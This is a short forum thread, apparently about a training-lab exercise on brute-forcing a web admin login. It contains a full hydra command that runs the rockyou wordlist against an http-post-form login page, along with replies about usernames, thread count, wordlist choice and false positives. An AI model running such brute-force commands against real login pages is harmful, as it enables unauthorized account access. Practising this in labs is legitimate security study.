Login Bruteforce assesment :website

hydra -l admin -P /usr/share/wordlists/rockyou.txt -u -f -s 30529 http-post-form “/admin_login.php:user=^USER^&pass=^PASS^:F=” -t 4 -I
i have been using this command can anybody help me?

Look at the hint. It says: " You may reuse the username you found earlier."
And the parameter -t 4, is too slow for the http FORM, is appropriate for the ssh brute force to not saturate it.
The difficult in the exercise is to find the correct wordlist.

So change to hydra -l user …

but do you also adapt here: /admin_login.php:user=user


Also I include :F=<form name='login', but whatever I tried, I get false positives.

1 Like